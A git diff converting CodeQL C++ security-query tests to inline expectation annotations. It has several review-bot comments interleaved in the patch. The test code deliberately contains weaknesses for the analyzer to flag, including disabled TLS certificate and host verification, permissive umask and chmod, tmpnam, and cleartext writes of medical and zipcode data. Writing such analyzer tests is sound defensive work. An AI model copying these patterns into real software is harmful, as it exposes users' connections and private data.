a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/ExposureSensitiveInformationUnauthorizedActor.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp index 6323d617ff13..a8df26ccae1e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test1/test.cpp @@ -9,7 +9,7 @@ int main(int argc, char *argv[]) { //umask(0022); FILE *fp; - fp = fopen("myFile.txt","w"); // BAD + fp = fopen("myFile.txt","w"); // BAD // $ Alert //chmod("myFile.txt",0644); fprintf(fp,"%s\n","data to file"); fclose(fp); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test2/ExposureSensitiveInformationUnauthorizedActor.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref index 0fa00ffe3abc..ff0854782f9d 100644 
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-200/test3/ExposureSensitiveInformationUnauthorizedActor.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +query: experimental/Security/CWE/CWE-200/ExposureSensitiveInformationUnauthorizedActor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref index 6e5213404373..2689b2c1bc01 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/IncorrectChangingWorkingDirectory.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql +query: experimental/Security/CWE/CWE-243/IncorrectChangingWorkingDirectory.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp index 24ff440d1400..5d5dddf6ef8c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-243/semmle/tests/test.cpp @@ -9,7 +9,7 @@ int chdir(char *path); void exit(int status); int funTest1(){ - if (chroot("/myFold/myTmp") == -1) { // BAD + if (chroot("/myFold/myTmp") == -1) { // BAD // $ Alert exit(-1); } return 0; @@ -26,7 +26,7 @@ int funTest2(){ } int funTest3(){ - chdir("/myFold/myTmp"); // BAD + chdir("/myFold/myTmp"); // BAD // $ Alert return 0; } int main(int argc, char *argv[]) 
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref index 9012747f4ba9..835b6c80fb1e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/IncorrectPrivilegeAssignment.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql +query: experimental/Security/CWE/CWE-266/IncorrectPrivilegeAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp index 57333e8f586e..85484793e98f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-266/semmle/tests/test.cpp @@ -6,7 +6,7 @@ int fclose(FILE *stream); void funcTest1() { - umask(0666); // BAD + umask(0666); // BAD // $ Alert FILE *fe; fe = fopen("myFile.txt", "wt"); fclose(fe); @@ -27,7 +27,7 @@ void funcTest2(int mode) FILE *fe; fe = fopen("myFile.txt", "wt"); fclose(fe); - chmod("myFile.txt",0555-mode); // BAD + chmod("myFile.txt",0555-mode); // BAD // $ Alert } void funcTest2g(int mode) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref index f1135f7d536a..77270c3533aa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/PamAuthorization.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE/CWE-285/PamAuthorization.ql +query: experimental/Security/CWE/CWE-285/PamAuthorization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp index e2753f10775e..eb6628850ea0 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-285/test.cpp @@ -26,7 +26,7 @@ bool PamAuthBad(const std::string &username_in, return false; } - err = pam_authenticate(pamh, 0); + err = pam_authenticate(pamh, 0); // $ Alert if (err != PAM_SUCCESS) return err; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp index 60a34889e05b..451ce5423e64 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.cpp @@ -22,8 +22,8 @@ char host[] = "codeql.com"; void bad(void) { std::unique_ptr curl = std::unique_ptr(curl_easy_init()); - curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYPEER, 0); - curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYHOST, 0); + curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYPEER, 0); // $ Alert + curl_easy_setopt(curl.get(), CURLOPT_SSL_VERIFYHOST, 0); // $ Alert curl_easy_setopt(curl.get(), CURLOPT_URL, host); curl_easy_perform(curl.get()); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref index 6b09ac53c9b7..e2dd11da1e8e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-295/CurlSSL.qlref 
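Review bot: The new expectation `err = pam_authenticate(pamh, 0); // $ Alert` in `PamAuthBad` has no `BAD` comment saying what is wrong with the call, unlike most of the other tests converted in this patch. The rest of the function is outside the hunk, so I am assuming the defect is the missing account check, in which case `// BAD: not followed by pam_acct_mgmt // $ Alert` would document it. The `@@ -22,8` hunk of CurlSSL.cpp has the same gap. There I would use `// BAD: disables peer certificate verification // $ Alert` on the `CURLOPT_SSL_VERIFYPEER` line and `// BAD: disables host name verification // $ Alert` on the `CURLOPT_SSL_VERIFYHOST` line.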
@@ -1 +1,2 @@ -experimental/Security/CWE/CWE-295/CurlSSL.ql +query: experimental/Security/CWE/CWE-295/CurlSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected index df8b26486f32..99a27a469894 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected 
@@ -1,3 +1,15 @@ +#select +| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | +| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | +| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. 
| test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | edges | test.cpp:45:18:45:23 | buffer | test.cpp:47:10:47:15 | buffer | provenance | | | test.cpp:47:10:47:15 | buffer | test.cpp:45:7:45:10 | *func | provenance | | 
@@ -32,15 +44,3 @@ nodes | test.cpp:99:61:99:70 | theZipcode | semmle.label | theZipcode | subpaths | test.cpp:81:22:81:28 | medical | test.cpp:45:18:45:23 | buffer | test.cpp:45:7:45:10 | *func | test.cpp:81:17:81:20 | call to func | -#select -| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | -| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. 
| -| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref index 65c8c9c2dd4c..0952582b4064 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-359/PrivateCleartextWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp index 4d69ee5b2b72..b123603654c0 100644 
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/test.cpp @@ -54,7 +54,7 @@ void file() FILE *file; // BAD: write zipcode to file in cleartext - fputs(theZipcode, file); + fputs(theZipcode, file); // $ Alert // GOOD: encrypt first char *encrypted = encrypt(theZipcode); @@ -71,15 +71,15 @@ int main(int argc, char **argv) char *buff4; // BAD: write medical to buffer in cleartext - sprintf(buff1, "%s", medical); + sprintf(buff1, "%s", medical); // $ Alert Source // BAD: write medical to buffer in cleartext - char *temp = medical; - sprintf(buff2, "%s", temp); + char *temp = medical; // $ Source + sprintf(buff2, "%s", temp); // $ Alert // BAD: write medical to buffer in cleartext - char *buff5 = func(medical); - sprintf(buff3, "%s", buff5); + char *buff5 = func(medical); // $ Source + sprintf(buff3, "%s", buff5); // $ Alert char *buff6 = encrypt(medical); // GOOD: encrypt first @@ -93,10 +93,10 @@ void stream() ofstream mystream; // BAD: write zipcode to file in cleartext - mystream << "the zipcode is: " << theZipcode; + mystream << "the zipcode is: " << theZipcode; // $ Alert Source // BAD: write zipcode to file in cleartext - (mystream << "the zipcode is: ").write(theZipcode, strlen(theZipcode)); + (mystream << "the zipcode is: ").write(theZipcode, strlen(theZipcode)); // $ Alert // GOOD: encrypt first char *encrypted = encrypt(theZipcode); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref index e134a5229da1..77407cfd8254 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/DivideByZeroUsingReturnValue.qlref 
@@ -1 +1,2 @@ -experimental/Security/CWE/CWE-369/DivideByZeroUsingReturnValue.ql +query: experimental/Security/CWE/CWE-369/DivideByZeroUsingReturnValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp index 882f66184854..3ea20ea8c44d 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-369/semmle/tests/test.cpp @@ -44,13 +44,13 @@ int getSize2(int type) { int badTestf1(int type, int met) { int is = getSize(type); - if (met == 1) return 123 / is; // BAD - else return 123 / getSize2(type); // BAD + if (met == 1) return 123 / is; // BAD // $ Alert + else return 123 / getSize2(type); // BAD // $ Alert } int badTestf2(int type) { int is; is = getSize(type); - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } int badTestf3(int type, int met) { @@ -62,23 +62,23 @@ int badTestf3(int type, int met) { case 2: if (0 == is) return 123 / is; // BAD [NOT DETECTED] case 3: - if (!is & 123 / is) // BAD + if (!is & 123 / is) // BAD // $ Alert return 123; case 4: - if (!is | 123 / is) // BAD + if (!is | 123 / is) // BAD // $ Alert return 123; case 5: - if (123 / is || !is) // BAD + if (123 / is || !is) // BAD // $ Alert return 123; case 6: - if (123 / is && !is) // BAD + if (123 / is && !is) // BAD // $ Alert return 123; case 7: - if (!is) return 123 / is; // BAD + if (!is) return 123 / is; // BAD // $ Alert case 8: - if (is > -1) return 123 / is; // BAD + if (is > -1) return 123 / is; // BAD // $ Alert case 9: - if (is < 2) return 123 / is; // BAD + if (is < 2) return 123 / is; // BAD // $ Alert } if (is != 0) return -1; if (is == 0) type += 1; 
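Review bot: The known false negative in the `@@ -62,23` hunk, `if (0 == is) return 123 / is; // BAD [NOT DETECTED]`, is left without an inline expectation, so after this conversion the divide-by-zero miss is recorded only in prose. I would annotate it as `if (0 == is) return 123 / is; // BAD [NOT DETECTED] // $ MISSING: Alert`, so the test flags the line once the query starts reporting it. The same applies to `badMySubDiv(type, is); // BAD [NOT DETECTED]` in the `@@ -255,12` hunk. `badTestf3` starts before and continues past this hunk, so other `[NOT DETECTED]` lines may exist outside it.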
@@ -125,20 +125,20 @@ int badTestf4(int type) { int is = getSize(type); int d; d = type * is; - return 123 / d; // BAD + return 123 / d; // BAD // $ Alert } int badTestf5(int type) { int is = getSize(type); int d; d = is / type; - return 123 / d; // BAD + return 123 / d; // BAD // $ Alert } int badTestf6(int type) { int is = getSize(type); int d; d = is / type; - return type * 123 / d; // BAD + return type * 123 / d; // BAD // $ Alert } int badTestf7(int type, int met) { @@ -150,7 +150,7 @@ int badTestf7(int type, int met) { return 123 / is; // GOOD } quit: - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } int goodTestf7(int type, int met) { @@ -169,8 +169,8 @@ int goodTestf7(int type, int met) { int badTestf8(int type) { int is = getSize(type); - type /= is; // BAD - type %= is; // BAD + type /= is; // BAD // $ Alert + type %= is; // BAD // $ Alert return type; } @@ -184,7 +184,7 @@ float getSizeFloat(float type) { } float badTestf9(float type) { float is = getSizeFloat(type); - return 123 / is; // BAD + return 123 / is; // BAD // $ Alert } float goodTestf9(float type) { float is = getSizeFloat(type); @@ -196,18 +196,18 @@ int badTestf10(int type) { int out = type; int is = getSize(type); if (is > -2) { - out /= 123 / (is + 1); // BAD + out /= 123 / (is + 1); // BAD // $ Alert } if (is > 0) { - return 123 / (is - 1); // BAD + return 123 / (is - 1); // BAD // $ Alert } if (is <= 0) return 0; - return 123 / (is - 1); // BAD + return 123 / (is - 1); // BAD // $ Alert return 0; } int badTestf11(int type) { int is = getSize(type); - return 123 / (is - 3); // BAD + return 123 / (is - 3); // BAD // $ Alert } int goodTestf11(int type) { 
@@ -255,12 +255,12 @@ int badMySubDiv(int type, int is) { void badTestf13(int type) { int is = getSize(type); - badMyDiv(type, is); // BAD - badMyDiv(type, is - 2); // BAD - badMySubDiv(type, is); // BAD + badMyDiv(type, is); // BAD // $ Alert + badMyDiv(type, is - 2); // BAD // $ Alert + badMySubDiv(type, is); // BAD // $ Alert goodMyDiv(type, is); // GOOD if (is < 5) - badMySubDiv(type, is); // BAD + badMySubDiv(type, is); // BAD // $ Alert if (is < 0) badMySubDiv(type, is); // BAD [NOT DETECTED] if (is > 5) @@ -270,9 +270,9 @@ void badTestf13(int type) { if (is > 0) badMyDiv(type, is); // GOOD if (is < 5) - badMyDiv(type, is - 3); // BAD + badMyDiv(type, is - 3); // BAD // $ Alert if (is < 0) - badMyDiv(type, is + 1); // BAD + badMyDiv(type, is + 1); // BAD // $ Alert if (is > 5) badMyDiv(type, is - 3); // GOOD } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref index beec38ab5dc6..d4fa44200b10 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/InsecureTemporaryFile.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql +query: experimental/Security/CWE/CWE-377/InsecureTemporaryFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp index 07efea49e784..9adc5304984c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-377/semmle/tests/test.cpp 
@@ -13,7 +13,7 @@ int fclose(FILE *stream); int funcTest1() { FILE *fp; - char *filename = tmpnam(NULL); // BAD + char *filename = tmpnam(NULL); // BAD // $ Alert fp = fopen(filename,"w"); fprintf(fp,"%s\n","data to file"); fclose(fp); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref index e80e86cbdccc..d3ede250c5b3 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/MemoryLeakOnFailedCallToRealloc.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-401/MemoryLeakOnFailedCallToRealloc.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c index df33fc19ef60..f5b58b8438fb 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-401/semmle/tests/test.c @@ -31,7 +31,7 @@ unsigned char * badResize_0(unsigned char * buffer,size_t currentSize,size_t new // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } 
@@ -60,7 +60,7 @@ unsigned char * badResize_1_0(unsigned char * buffer,size_t currentSize,size_t n // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } @@ -136,7 +136,7 @@ unsigned char * badResize_1_1(unsigned char * buffer,size_t currentSize,size_t n // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } if(!buffer) aFakeFailed_1(1, 1); @@ -183,7 +183,7 @@ unsigned char * badResize_2_0(unsigned char * buffer,size_t currentSize,size_t n assert(buffer!=0); if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } return buffer; } @@ -279,7 +279,7 @@ unsigned char *goodResize_3_1(unsigned char *buffer, size_t currentSize, size_t unsigned char *tmp = buffer; if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert if (buffer == NULL) { free(tmp); @@ -296,7 +296,7 @@ unsigned char *goodResize_3_2(unsigned char *buffer, size_t currentSize, size_t unsigned char *tmp = buffer; if (currentSize < newSize) { - tmp = (unsigned char *)realloc(tmp, newSize); + tmp = (unsigned char *)realloc(tmp, newSize); // $ Alert if (tmp != 0) { buffer = tmp; @@ -325,7 +325,7 @@ unsigned char * badResize_5_2(unsigned char *buffer, size_t currentSize, size_t // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert } if (cond) { 
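Review bot: In the goodResize_3_1 and goodResize_3_2 hunks the realloc calls are annotated with a plain `// $ Alert`, although both functions keep the original pointer in `tmp` and are named as safe patterns. That records what looks like a false positive of the leak query as an expected true result. If the alerts are indeed unwanted, mark them `buffer = (unsigned char *)realloc(buffer, newSize); // $ SPURIOUS: Alert` and `tmp = (unsigned char *)realloc(tmp, newSize); // $ SPURIOUS: Alert` so the imprecision stays visible in the test. Both function bodies continue outside their hunks.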
@@ -339,7 +339,7 @@ unsigned char * badResize_5_1(unsigned char *buffer, size_t currentSize, size_t // BAD: on unsuccessful call to realloc, we will lose a pointer to a valid memory block if (currentSize < newSize) { - buffer = (unsigned char *)realloc(buffer, newSize); + buffer = (unsigned char *)realloc(buffer, newSize); // $ Alert assert(cond); // irrelevant } return buffer; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected index b813f8532cb7..363b2aafa0fa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected 
